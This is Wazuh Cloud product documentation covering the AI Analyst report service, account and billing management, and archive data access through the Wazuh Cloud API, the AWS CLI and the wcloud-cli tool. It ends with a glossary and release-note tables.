Failed        The creation of your environment failed.
Maintenance   Your environment is under maintenance. It will be available when finished.
Suspending    Your environment is being suspended due to lack of payment.
Suspended     Your environment is suspended.
Resuming      Your environment is resuming after suspension. It will be available soon.
Terminated    Your environment was deleted.

AI Analyst

The Wazuh AI Analyst service provides Wazuh Cloud users with insights into their security posture and offers recommendations on how to remediate threats detected within their Wazuh Cloud subscription.

This service is an automated AI-powered security analysis solution that integrates Wazuh Cloud with AI models. It leverages machine learning capabilities to process security data and deliver actionable insights to help improve organizational security.

The service provides organizations with:

  • Automated security analysis without manual intervention.

  • Insights aggregated from multiple security data sources.

  • Structured recommendations to improve security posture.

  • Regular assessments of security posture through scheduled analyses.

The service periodically sends emails and reports. You can download these reports from the Wazuh Cloud Console.

AI Analyst email

Users receive periodic emails with key performance indicators and a summary of their security posture. Each email includes:

  • A histogram showing the number of protected endpoints.

  • The volume of alerts received by the Wazuh server.

  • The number of active vulnerabilities.

  • A summary of the current security posture.

  • The AI Analyst report attached as a PDF.

AI Analyst report

The report includes AI-generated insights based on data from the user's Wazuh Cloud subscription. It contains the following sections:

  • Overall assessment

  • Alert analysis

  • Vulnerability analysis

  • Endpoint analysis

Overall assessment

A summary generated by the AI, providing an overall evaluation of the organization's security posture during the reporting period.

Alert analysis

Wazuh analyzes log data collected across the monitored infrastructure. Each log is evaluated against predefined security rules, each tagged with a criticality level. This section presents alert data analysis by MITRE technique and alert level, along with a summary of recommended actions.

Vulnerability analysis

Software vulnerabilities are weaknesses in code that attackers can exploit to gain unauthorized access or alter application behavior. Vulnerable software applications are commonly targeted by attackers to compromise endpoints and gain a persistent presence on targeted networks.

Endpoint analysis

Highlights the ten most active endpoints based on alert volume. This helps identify areas with elevated security activity.

Generating the report

Follow the steps below to generate the AI analyst report for your environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select your specific environment.

  3. Navigate to the AI Reports tab.

  4. Click on the available report to view and download the report as a PDF file.

Generating the report
Data privacy and security FAQ
Is data from Wazuh Cloud subscriptions shared with third parties?

No, data from Wazuh Cloud subscriptions is not shared with third parties. Data is processed by AWS Bedrock and Anthropic's Claude model solely within the AI pipeline. It is not shared beyond that scope. Both providers follow strict data protection policies that prevent sharing of customer data with external parties.

Is data used to train AI models?

No, your data is not used to train AI models. Customer data is not used for model training or improvement, as stated in Anthropic's terms of service under AWS Bedrock. Data is only used to generate your security analysis reports and is not retained or used for any other purposes.

Can data leak to third parties?

The service implements multiple layers of security to prevent data leaks:

  • Encrypted data transmission.

  • Enterprise-grade security controls in AWS Bedrock.

  • Isolated processing environments for Claude.

  • No permanent data storage during processing.

  • Restricted access to authorized Wazuh service components only.

How should I use the recommendations in the AI Analyst report?

Treat AI-generated recommendations as advisory. Users are responsible for:

  • Reviewing and validating all AI-generated recommendations.

  • Acting based on internal security policies and risk assessments.

  • Consulting with security professionals when necessary.

The service is subject to the limitations and disclaimers outlined in AWS service terms (Section 50) and Anthropic's commercial terms of service.

Service operations FAQ
How often are reports generated?

Reports are generated based on your Wazuh Cloud subscription and configuration settings.

Can I customize the analysis parameters?

Not currently. The service uses predefined parameters optimized for comprehensive security assessment.

What happens if the AI service is unavailable?

Report generation is paused during outages and resumes automatically when the service is restored.

How long are reports retained?

Reports remain available in the Wazuh Console per your subscription's data retention policy. Emails are sent to designated technical contacts and may be retained indefinitely.

What data is included in the analysis?

The analysis includes:

  • Security alerts and MITRE ATT&CK mappings

  • Vulnerability scan results

  • High-priority rule triggers

  • Endpoint activity patterns

  • Operating system and package vulnerability data

Can I opt out of the AI Analyst service?

Yes. You can disable the service through your Wazuh Cloud subscription settings. Contact your administrator or Wazuh Support for assistance.

Account and billing

This section describes the actions you can perform in your account using the Wazuh Cloud Console.

Edit user settings

You can edit your account preferences, such as email address and password from the Wazuh Cloud Console. You can also enable multi-factor authentication to increase security and see login method alternatives.

Configure your user profile

You can configure your name, last name, company name, country, phone number, and website.

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Fill in or edit the fields. Company and Country are required in order to continue.

  4. Click Save to complete the action.

Update your email address

Each Wazuh Cloud account has a primary email associated with it. If needed, you can change this primary email address.

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Click Email address.

  4. Enter a new email address and your current password, then click Save to confirm the action.

An email is sent to the new address with a link to confirm the change.

Change your Wazuh Cloud Console password

When you signed up for a Wazuh Cloud account with your email address, you selected a password that you use to log in to the console. If needed, you can change this password.

If you know your current password:

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. In Change password, enter the current password and provide the new password that you want to use.

  4. Click Save to confirm the action.

If you don’t know your current password:

  1. Click on Forgot my password on the login page of the Wazuh Cloud Console.

  2. Enter the primary email address for your account and click Reset password.

An email is sent to your address with a link to reset the password.

Enable multi-factor authentication

To add an extra layer of security to your Wazuh Cloud account, you can set up a virtual MFA device such as Google Authenticator.

To enable multi-factor authentication:

  1. Log in to the Wazuh Cloud Console and click the upper-right user icon to open the menu.

  2. Go to User settings.

  3. Under Multi-factor authentication, click Add MFA and follow the steps described in the Set up virtual MFA device pane.

  4. Click Enable MFA to complete the process.

If your device is lost or stolen, contact support through the Help section of the Wazuh Cloud Console.

Manage your billing details

To continue using your environment beyond the trial period, you need to add credit card details to your Wazuh Cloud account. Your credit card information is sent securely to our billing provider and stored with them.

Note

A trial environment is converted to a paid environment when the trial expires, provided that you have added your billing details. If you do not add your credit card information before the expiration date, your environment is deleted, and all data is permanently erased. Make sure to add your credit card before the end of the trial period.

Add your billing details

To add the billing details:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Billing.

  3. Select Add billing information in the Payment method section.

  4. Fill in the form with your billing details.

  5. Click Save to confirm the payment method.

You can stop upcoming charges by canceling your environments.

Note

Cancellation cannot be undone, and all data will be permanently deleted.

Remove your billing details

You can only remove billing details when there are no active paid environments. This means one of the following:

  • There are no environments.

  • The only active environment is in a trial period.

  • All the environments have been canceled.

In order to remove your billing information:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section, select Billing, and select Payment method.

  3. Select Delete in the Payment method section. The button is disabled if there is an active paid environment.

  4. Confirm Delete in the pop-up.

See your billing cycle and history

Information about your current billing cycle, outstanding payments, and billing receipts is available from the Wazuh Cloud Console. The billing cycle is the period between the last billing date and the current billing date, while your billing history shows an overview of all invoices issued for your account.

To see your current billing cycle information:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Summary under Billing.

You can see the details about the upcoming billing for your active environments under the current billing cycle.

To see your billing history:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section, select Billing and select Invoices.

  3. Click the invoice to download a PDF with your billing history details.

Update billing and operational contacts

You can specify billing and operational contacts in addition to the primary email address of your account.

Note

Billing and operational contacts are for notification purposes only; they cannot be used to log in to the Wazuh Cloud Console. To access the Wazuh Cloud Console, you must use the primary email address for your account.

To update billing and operational contacts:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select Contacts.

  3. Add or remove contacts from the desired category.

You can specify multiple email addresses for each category. Changes take effect immediately, and no confirmation from the added addresses is required.

Stop charges for an environment

You can always cancel an environment you no longer need. When performing this action, the environment is removed at the end of the billing cycle, with no new or additional charges incurred.

To stop being charged for an environment:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Environments page and select the environment you want to cancel.

  3. Click Cancel environment and confirm the cancellation.

Warning

Cancellation cannot be undone, and all data is permanently deleted with this action.

Billing FAQ
When is my credit card charged?

Each environment is charged monthly, based on the environment's start date.

Is my credit card information safe?

Your credit card information is sent securely to our billing provider, Stripe, and stored there.

Where can I see the next payment for an environment?

Go to the See your billing cycle and history section to learn how to view the billing details of your environments.

What happens to my payments if I want to upgrade or downgrade a setting?

If you upgrade a setting, you make an immediate prorated payment, and the upgrade takes effect right away at the increased price for your environment. If you downgrade a setting, the change takes effect in the next billing cycle, and your price is adjusted accordingly. See Adjusting environment settings for further details.

How do I view previous receipts and billing history?

Go to the See your billing cycle and history section to learn how to download an overview of all invoices issued for your account.

How can I configure who receives receipts and billing notifications?

Go to Update billing and operational contacts section to learn how to configure who receives receipts and billing notifications.

What are the available payment methods on Wazuh Cloud?

Credit and debit card payments are supported. To learn which cards are accepted, see the list of supported card brands in the documentation of Stripe, our certified payment processor.

Can I get a refund?

Charges are nonrefundable, but if you no longer want to use an environment, you can cancel it at any time. No new charges are incurred beyond the current billing period. For any special considerations regarding a refund, contact us through the Help section of the Wazuh Cloud Console.

What is included in my Wazuh Cloud environment?

A full Wazuh deployment, sized according to your settings, plus a standard or premium support service.

How can I request more information?

You can contact the Wazuh team anytime through the Help section on your Wazuh Cloud Console.

Archive data

Wazuh provides two types of storage for your data:

  • Indexed data

  • Archive data

When Wazuh ingests and indexes events from agents, the data becomes searchable and analyzable in the Wazuh dashboard. This information is stored in indexed data, which is limited by your indexed data retention and indexed data capacity (formerly known as tier) settings. Simultaneously, the data is sent to archive data with a maximum delay of 30 minutes after initial processing by Wazuh. Archive data is stored in an AWS S3 bucket, allowing you to store logs for extended periods and meet compliance requirements. Additionally, you can reindex the data to other environments for further investigations.

Environment example for data storage

This example environment is configured with the following settings:

  • Indexed data retention: 3 months

  • Indexed data capacity (formerly known as tier): 100 GB

  • Archive data: 1 year

Assuming that Wazuh ingests 5 GB of data daily and 20% of events generate alerts, it indexes 1 GB per day. In this scenario, the indexed data capacity could hold up to 100 days of alerts (100 GB ÷ 1 GB per day), but the data is rotated to keep only 3 months, as specified in the indexed data retention setting. All information from the past year remains accessible in the archive data, according to the archive data setting.

This configuration ensures that recent alerts are readily available in the indexed data, while older data is securely stored in the archive data for compliance and historical purposes.

For more information about the archive data feature in the Wazuh Cloud service, please refer to the following sections:

Configuration

Your environment is configured by default to send Wazuh output files to archive data.

There are two Wazuh output files in JSON format:

  • /var/ossec/logs/archives/archives.json: If you set logall_json to yes, Wazuh stores all events in this file and sends it to archive data, regardless of whether they triggered an alert.

  • /var/ossec/logs/alerts/alerts.json: This file contains only the events that triggered a rule with a priority above a configurable threshold. It is always sent to archive data.

Both files are delivered to archive data as soon as they are rotated and compressed. This process usually takes between 10 and 30 minutes from the moment the event is received.

The oldest files in the archive data are rotated based on the archive data setting.

Note

Files with a .log extension are never sent to archive data.

Filename format

The files are stored in a directory structure that indicates the date and time the file was delivered to the archive data.

The main path follows this format:

wazuh-cloud-cold-<REGION>/<CLOUD_ID>/<CATEGORY>[/<SUBCATEGORY>]/<YEAR>/<MONTH>/<DAY>

Each file has the following name:

<CLOUD_ID>_<CATEGORY>[_<SUBCATEGORY>]_<YYYYMMDDTHHmm>_<UniqueString>.<FORMAT>

The files include the following fields:

  • <REGION>: The region where the environment is located.

  • <CLOUD_ID>: The Cloud ID of the environment.

  • <CATEGORY>: This field is always output.

  • <SUBCATEGORY>: This field is only used by the output category and contains alerts or archives files.

  • <YEAR>: The year when the file was delivered.

  • <MONTH>: The month when the file was delivered.

  • <DAY>: The day when the file was delivered.

  • <YYYYMMDDTHHmm>: Digits of the year, month, day, hour, and minute when the file was delivered. Hours are in 24-hour format and in UTC. A log file delivered at a specific time can contain records written at any point before that time.

  • <UniqueString>: A 16-character string that prevents files from being overwritten. It has no meaning, and log processing software should ignore it.

  • <FORMAT>: The encoding of the file: json.gz for output files (a JSON text file compressed with gzip) and tar.gz for configuration files.
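
For example, the alerts file used in the listing and download examples below breaks down as follows:

wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz

  • <REGION>: us-east-1

  • <CLOUD_ID>: 012345678ab

  • <CATEGORY>: output

  • <SUBCATEGORY>: alerts

  • <YEAR>/<MONTH>/<DAY>: 2024/04/19

  • <YYYYMMDDTHHmm>: 20240419T2050 (delivered on 2024-04-19 at 20:50 UTC)

  • <UniqueString>: VqaWCpX9oPfDkRpD

  • <FORMAT>: json.gz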

Access

To access your archive data, you need an AWS token that grants permission on the AWS S3 bucket of your environment. This token can be generated using the Wazuh Cloud API.

Note

See the Wazuh Cloud CLI section to learn how to list and download your archive data automatically.

Getting your API key and the AWS token
  1. Obtain your Wazuh Cloud API key by following the steps outlined in the API Authentication section.

  2. Use the POST /storage/token API endpoint with your key to get a temporary AWS token. For example, the following request generates an AWS token, valid for 3600 seconds, that grants access to the archive data of the environment with Cloud ID 012345678ab.

    curl -XPOST https://api.cloud.wazuh.com/v2/storage/token -H "x-api-key: <YOUR_API_KEY>" -H "Content-Type: application/json" --data '
    {
       "environment_cloud_id": "012345678ab",
       "token_expiration": "3600"
    }'

    The response contains temporary AWS credentials:

    {
       "environment_cloud_id": "012345678ab",
       "aws": {
          "s3_path": "wazuh-cloud-cold-us-east-1/012345678ab",
          "region": "us-east-1",
          "credentials": {
             "access_key_id": "mUdT2dBjlHd...Gh7Ni1yZKR5If",
             "secret_access_key": "qEzCk63a224...5aB+e4fC1BR0G",
             "session_token": "MRg3t7HIuoA...4o4BXSAcPfUD8",
             "expires_in": 3600
          }
       }
    }
    
Generating the AWS wazuh_cloud_storage profile

Add the token to the AWS credentials file ~/.aws/credentials.

[wazuh_cloud_storage]
aws_access_key_id = mUdT2dBjlHd...Gh7Ni1yZKR5If
aws_secret_access_key = qEzCk63a224...5aB+e4fC1BR0G
aws_session_token = MRg3t7HIuoA...4o4BXSAcPfUD8
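
Alternatively, the same temporary credentials can be exported as standard AWS CLI environment variables instead of adding a profile. The following is a minimal sketch using the placeholder values from the example response above; when environment variables are used, omit the --profile wazuh_cloud_storage option from the aws commands in the next sections.

# export AWS_ACCESS_KEY_ID="mUdT2dBjlHd...Gh7Ni1yZKR5If"
# export AWS_SECRET_ACCESS_KEY="qEzCk63a224...5aB+e4fC1BR0G"
# export AWS_SESSION_TOKEN="MRg3t7HIuoA...4o4BXSAcPfUD8"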
Listing archive data

This command lists the archive data files of the environment 012345678ab.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 ls --recursive s3://wazuh-cloud-cold-us-east-1/012345678ab/
2024-04-19 17:50:06        493 012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
2024-04-19 18:00:05      77759 012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz
Examples
Downloading archive data – Multiple files

This command downloads the archive data files of the environment 012345678ab into the /home/test/ directory.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 cp --recursive s3://wazuh-cloud-cold-us-east-1/012345678ab/ /home/test/
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz to output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz to output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2100_kdBY42OvE9QJuiia.json.gz
Downloading archive data – Single file

This command downloads the 012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz file of the environment 012345678ab into the directory /home/test.

# aws --profile wazuh_cloud_storage --region us-east-1 s3 cp s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz /home/test/
download: s3://wazuh-cloud-cold-us-east-1/012345678ab/output/alerts/2024/04/19/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz to /home/test/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz
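
The downloaded output files are gzip-compressed JSON text with one event per line. As a quick check, you can decompress and pretty-print the first event; this sketch assumes the zcat and jq utilities are installed on your system:

# zcat /home/test/012345678ab_output_alerts_20240419T2050_VqaWCpX9oPfDkRpD.json.gz | head -n 1 | jq .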
Wazuh Cloud API

Wazuh Cloud provides a Wazuh Cloud API that allows you to perform some operations with your cloud environments, such as downloading archive data.

This section provides information on the following:

Authentication

Wazuh Cloud supports only API key-based authentication.

To obtain a Wazuh Cloud API key:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select API Keys.

  3. Click Generate API Key.

  4. Provide a name and click Generate API key.

  5. Copy the generated API key and store it in a safe place.

Note

The API key has no expiration date, so it can be used indefinitely. You might also have multiple API keys for different purposes, and you can revoke them when you no longer need them.
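
The API key is sent in the x-api-key header of each request. For example, the POST /storage/token request from the archive data section is authenticated as follows (the key and Cloud ID are placeholders):

# curl -XPOST https://api.cloud.wazuh.com/v2/storage/token -H "x-api-key: <YOUR_API_KEY>" -H "Content-Type: application/json" --data '{"environment_cloud_id": "<CLOUD_ID>", "token_expiration": "3600"}'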

To revoke an API key:

  1. Log in to the Wazuh Cloud Console.

  2. Go to the Account section and select API Keys.

  3. Click the trash icon under the Revoke column for any API key you want to delete.

  4. Click Revoke Api key to confirm the action.

The revoked API key is removed from the list of API keys.

Reference
CLI

The Wazuh Cloud Command Line Interface (wcloud-cli) is a tool that allows you to interact with Wazuh Cloud using commands in your command-line shell.

Requirements

To use wcloud-cli, you need to install the following components (an example installation command for the Python packages is shown after the list):

  • Python 3.x

  • boto3 Python package

  • requests Python package
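
For example, on a host that already has Python 3 and pip available, the Python packages listed above can be installed as follows (use the pip command that matches your Python 3 installation):

# pip3 install boto3 requests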

Installation
  1. Use the following command to download the CLI tool.

    # curl -so ~/wcloud-cli https://packages.wazuh.com/resources/cloud/wcloud-cli && chmod 500 ~/wcloud-cli
    
  2. Run it with the version argument to confirm that the installation was successful.

    # ~/wcloud-cli version
    
    Wazuh Cloud CLI - "version": "1.0.1"
    
Configuration

You can configure the settings that the Wazuh Cloud CLI (wcloud-cli) uses to interact with Wazuh Cloud.

By default, the Wazuh Cloud CLI reads the credential information from a local file named credentials, located in the .wazuh-cloud folder of your home directory. The location of your home directory varies based on the operating system, but you can find it using the environment variables %UserProfile% in Windows, and $HOME or ~ (tilde) in Unix-based systems.

You can specify a non-default location for the credentials file by setting the WAZUH_CLOUD_CREDENTIALS_FILE environment variable to another local path.
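
For example, to point the CLI at a credentials file stored outside your home directory (the path below is illustrative):

# export WAZUH_CLOUD_CREDENTIALS_FILE=/opt/wazuh-cloud/credentials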

  1. Create the credentials file and add your API key.

    # mkdir -p ~/.wazuh-cloud
    # touch ~/.wazuh-cloud/credentials
    
    [default]
    wazuh_cloud_api_key_name = Test
    wazuh_cloud_api_key_secret = MDAwMDAwMDQ2T047Q4JVY1Sm5dDOqpDtkCQiY89fHjuZT3c90zs2
    

    The file is organized into profiles, each a named collection of credentials. When you specify a profile to run a command, that profile's credentials are used. You can define one default profile that is used when no profile is explicitly referenced.

  2. Use the following command to test your credentials. Optionally, you can specify the profile.

    # wcloud-cli test-credentials --profile <PROFILE_NAME>
    
    The API key 'Test' in the profile 'default' is valid.
    
Examples
Getting S3 token for archive data

This command generates an AWS token to access the archive data of the environment with Cloud ID 012345678ab.

# wcloud-cli cold-storage get-aws-s3-token 012345678ab
Environment Cloud ID: '012345678ab'
Region: 'us-east-1'
S3 path: 'wazuh-cloud-cold-us-east-1/012345678ab'

The following AWS credentials will be valid until 2024-04-22 13:55:27:
[wazuh_cloud_storage]
aws_access_key_id = A...M
aws_secret_access_key = L...0
aws_session_token = F...Q==
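
Based on the output shown above, the printed [wazuh_cloud_storage] block can be appended to your AWS credentials file so that the aws commands from the archive data section work unchanged. This is a sketch that assumes the output format stays as shown; remove expired profiles from ~/.aws/credentials manually.

# wcloud-cli cold-storage get-aws-s3-token 012345678ab | grep -A 3 '^\[wazuh_cloud_storage\]' >> ~/.aws/credentials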
Listing archive data

This command lists the archive data files of the environment 012345678ab between the specified dates.

# wcloud-cli cold-storage list 012345678ab --start 2021-05-07 --end 2021-05-07
Environment '012345678ab' files from 2021-05-07 to 2021-05-07:
012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Downloading archive data

This command downloads the archive data files of the environment 012345678ab between the specified dates into the /home/test directory.

# wcloud-cli cold-storage download 012345678ab /home/test --start 2021-05-07 --end 2021-05-07
Environment '012345678ab' files from 2021-05-07 to 2021-05-07:
Downloading object 012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Downloaded object 012345678ab/output/alerts/2021/05/07/012345678ab_output_alerts_20210507T1040_mXSoDTf5Pgyr8b8D.json.gz
Glossary

Here is a list of terms related to Wazuh Cloud.

Cloud Console

The Wazuh Cloud Console provides web-based access to manage your Wazuh Cloud environments.

Cloud ID

The Cloud ID is a unique ID for your environment on Wazuh Cloud. It is used for multiple purposes, such as Wazuh WUI access or the agent registration process.

Environment

An environment is a deployment that contains all the Wazuh components ready to use and running on Wazuh Cloud.

Archive data

Formerly known as cold storage, this is the data containing the output generated by Wazuh, such as alerts and archives. It is stored in an AWS S3 bucket, allowing you to keep logs for longer periods and meet compliance requirements.

Indexed data

Formerly known as hot storage, it's the data available on the Wazuh dashboard corresponding to the information indexed by Wazuh. This information is available as soon as Wazuh ingests and indexes the events sent by the agents, making the data searchable and analyzable.

Indexed data is calculated using the primary shards of wazuh-* indices.

Tier

The concept of a tier, which represents the size limitation, in bytes, of the indexed data (formerly known as hot storage), is no longer used. It has been replaced by the indexed data capacity setting.

Setting

In the context of Wazuh Cloud, a setting refers to each configuration option available for a cloud environment. These settings determine the limitations, functionalities, and pricing of an environment.

Profile

A profile refers to predefined settings that you can choose from when configuring your Wazuh Cloud environment. We have three profiles available: Small, Medium, and Large. These profiles are designed to simplify the process by providing preconfigured settings that cater to different needs and requirements. If none of the predefined profiles meet your specific requirements, you can configure your settings individually.

Region

A region is a geographic area where the data center of the cloud provider that hosts your environment is located. The region you select cannot be changed after you create an environment. If you are not sure what to pick, choose a region that is geographically close to you to reduce latency.

Available regions:

Asia Pacific

  • Tokyo: ap-northeast-1

  • Mumbai: ap-south-1

  • Singapore: ap-southeast-1

  • Sydney: ap-southeast-2

Europe

  • Frankfurt: eu-central-1

  • London: eu-west-2

North America

  • Canada: ca-central-1

  • North Virginia: us-east-1

  • Ohio: us-east-2

Wazuh Cloud API

The Wazuh Cloud API is an application programming interface used to interact with Wazuh Cloud, for example, to access an environment's archive data.

Wazuh Cloud CLI

The Wazuh Cloud Command Line Interface is a tool that enables you to interact with Wazuh Cloud using commands in your command-line shell.

Development

This section of the documentation helps developers to understand Wazuh at the development level. It provides the technical resources required to understand the Wazuh architecture, extend its capabilities, and tailor the platform to specific operational requirements.

Release notes

This section summarizes the most important features of each Wazuh release.

Wazuh version

Release date

5.0.0

TBD

4.14.3

TBD

4.14.2

TBD

4.14.1

12 November 2025

4.14.0

23 October 2025

4.13.1

24 September 2025

4.13.0

18 September 2025

4.12.0

7 May 2025

4.11.2

1 April 2025

4.11.1

12 March 2025

4.11.0

20 February 2025

4.10.3

19 August 2025

4.10.2

22 May 2025

4.10.1

16 January 2025

4.10.0

9 January 2025

4.9.2

4 November 2024

4.9.1

17 October 2024

4.9.0

5 September 2024

4.8.2

20 August 2024

4.8.1

18 July 2024

4.8.0

12 June 2024

4.7.5

30 May 2024

4.7.4

29 April 2024

4.7.3

4 March 2024

4.7.2

10 January 2024

4.7.1

20 December 2023

4.7.0

27 November 2023

4.6.0

31 October 2023

4.5.4

23 October 2023

4.5.3

10 October 2023

4.5.2

6 September 2023

4.5.1

24 August 2023

4.5.0

10 August 2023

4.4.5

10 July 2023

4.4.4

13 June 2023

4.4.3

25 May 2023

4.4.2

18 May 2023

4.4.1

12 April 2023

4.4.0

28 March 2023

4.3.11

24 April 2023

4.3.10

16 November 2022

4.3.9

13 October 2022

4.3.8

19 September 2022

4.3.7

24 August 2022

4.3.6

20 July 2022

4.3.5

29 June 2022

4.3.4

8 June 2022

4.3.3

1 June 2022

4.3.2

30 May 2022

4.3.1

18 May 2022

4.3.0

5 May 2022

4.2.7

30 May 2022

4.2.6

28 March 2022

4.2.5

15 November 2021

4.2.4

20 October 2021

4.2.3

6 October 2021

4.2.2

28 September 2021

4.2.1

3 September 2021

4.2.0

25 August 2021

4.1.5

22 April 2021

4.1.4

25 March 2021

4.1.3

23 March 2021

4.1.2

8 March 2021

4.1.1

25 February 2021

4.1.0

15 February 2021

4.0.4

14 January 2021

4.0.3

30 November 2020

4.0.2

24 November 2020

4.0.1

11 November 2020

4.0.0

23 October 2020

3.13.6

19 September 2022

3.13.5

24 August 2022

3.13.4

30 May 2022

3.13.3

28 April 2021

3.13.2

22 September 2020

3.13.1

15 July 2020

3.13.0

22 June 2020

3.12.3

30 April 2020

3.12.2

9 April 2020

3.12.1

8 April 2020

3.12.0

24 March 2020

3.11.4

25 February 2020

3.11.3

28 January 2020

3.11.2

22 January 2020

3.11.1

10 January 2020

3.11.0

23 December 2019

3.10.2

23 September 2019

3.10.1

19 September 2019

3.10.0

18 September 2019

3.9.5

8 August 2019

3.9.4

7 August 2019

3.9.3

9 July 2019

3.9.2

10 June 2019

3.9.1

21 May 2019

3.9.0

2 May 2019

3.8.2

31 January 2019

3.8.1

24 January 2019

3.8.0

18 January 2019

3.7.2

17 December 2018

3.7.1

5 December 2018

3.7.0

10 November 2018

3.6.1

7 September 2018

3.6.0

29 August 2018

3.5.0

10 August 2018

3.4.0

24 July 2018

3.3.1

18 June 2018

3.3.0

8 June 2018

3.2.4

1 June 2018

3.2.3

28 May 2018

3.2.2

7 May 2018

3.2.1

2 March 2018

3.2.0

8 February 2018

3.1.0

22 December 2017

3.0.0

3 December 2017

2.1.0

17 August 2017

5.x

This section summarizes the most important features of each Wazuh 5.x release.

Wazuh version

Release date

5.0.0

TBD

5.0.0 Release notes - TBD

This section lists the changes in version 5.0.0. Every update of the Wazuh solution is cumulative and includes all enhancements and fixes from previous releases.

Highlights
Breaking changes
What's new

This release includes new features or enhancements as the following:

  • #7827 Added default notification channels through the health check.

  • #7597 Added sample data generators for agent monitoring and server statistics.

  • #7662 Added "form-data": "^4.0.4" to the resolutions section to enforce the required dependency version.

  • #7694 Added prompts to views related to Server API connectivity and alerts index pattern issues.

  • Added a Not applicable status to the SCA CheckResult enum, including color mapping (#B9A888) and sample data support.

  • #7833 Added alerting sample monitors to the health check.

  • #7917, #7975, #7990, #7994 Added the Normalization application.

  • #7924 Added the default wazuh-events* index pattern.

  • #7839 Adapted alerts sample data to the Wazuh Common Schema.

  • #7688 Set cluster mode as the default for all Wazuh installations, including single-node deployments, and updated RBAC permissions to cluster:* actions.

  • #7578, #7929, #7974, #7979 Reworked SCA module visualizations, enabled global details for all agents without pinning, replaced the /sca endpoint with the wazuh-states-sca-* index pattern, and added sample data support.

  • #7604 Split the FIM registry inventory into two index patterns and updated fields in FIM file and registry sample data.

  • #7622, #7694, #7756, #7829 Reworked the health check.

  • #7622 Reworked several view components to use data sources.

  • #7754 Fixed date and format errors across multiple views.

  • #7812 Upgraded the brace-expansion dependency to versions 1.1.12 and 2.0.2.

  • #7812 Upgraded the tar-fs dependency to version 2.1.4.

  • #7871 Migrated wazuh.yml settings to opensearch_dashboards.yml and advanced settings.

  • #7871 Changed sample data index names.

  • #7900 Reworked the Generate report button.

  • #7842, #7847, #7916, #7938 Changed the dashboard renderer to use saved objects.

  • #7934 Changed the rule.groups filter to wazuh.integration.decoders.

  • #7981 Applied the new home page navigation style to all dashboards.

  • #7688 Removed manager-specific logic in favor of cluster-based management.

  • #7597 Removed backend monitoring and statistics jobs.

  • #7597, #7698 Removed monitoring and statistics job settings from the configuration.

  • #7597 Removed the prompt related to disabled statistics jobs in the Statistics application.

  • #7612 Removed configuration for modules relying on deprecated daemons: wazuh-agentlessd, wazuh-csyslogd, wazuh-dbd, wazuh-integratord, wazuh-maild, and wazuh-reportd.

  • #7645 Removed deprecated modules: OpenSCAP, CIS-CAT, and Osquery.

  • #7622 Removed the /health-check and /blank-screen frontend routes.

  • #7622 Removed the Miscellaneous section from App Settings.

  • #7622 Removed deprecated health check and customization settings.

  • #7871 Removed legacy customization, alerts sample, and UI API editable settings.

  • #7871 Removed the App Settings application.

  • #7871 Removed GET /elastic/alerts and /utils/configuration* endpoints.

  • #7871 Removed tasks related to custom logo sanitization and reports directory migration.

  • #7901 Removed the Rules, Decoders, CDB List, and Ruleset test applications.

  • #7899 Removed the legacy reporting application, including server routes, UI, PDF generation logic, and related customization settings.

  • #7932 Removed several sections from Server Management > Settings and agent configuration.

  • #7933 Removed the wazuh-alerts* index pattern and replaced it with wazuh-events* as the default. Index pattern selection is now handled per module.

  • #7933 Removed deprecated ip.ignore and pattern settings.

  • #7977 Removed references to alerts and archives templates.

  • #7857, #7868, #7891, #7982 Removed indexer resource files from the source code and dependency installation process.

Resolved issues

This release resolves known issues as the following:

  • #7923 Fixed a hardcoded version value in the Deploy agent wizard.

Changelogs

The repository changelogs provide more details about the changes.

Product repositories
Auxiliary repositories

4.x

This section summarizes the most important features of each Wazuh 4.x release.

Wazuh version

Release date

4.14.3

TBD

4.14.2

TBD

4.14.1

12 November 2025

4.14.0

23 October 2025

4.13.1

24 September 2025

4.13.0

18 September 2025

4.12.0

7 May 2025

4.11.2

1 April 2025

4.11.1

12 March 2025

4.11.0

20 February 2025

4.10.3

19 August 2025

4.10.2

22 May 2025

4.10.1

16 January 2025

4.10.0

9 January 2025

4.9.2

4 November 2024

4.9.1

17 October 2024

4.9.0

5 September 2024

4.8.2

20 August 2024

4.8.1

18 July 2024

4.8.0

12 June 2024

4.7.5

30 May 2024

4.7.4

29 April 2024

4.7.3

4 March 2024

4.7.2

10 January 2024

4.7.1

20 December 2023

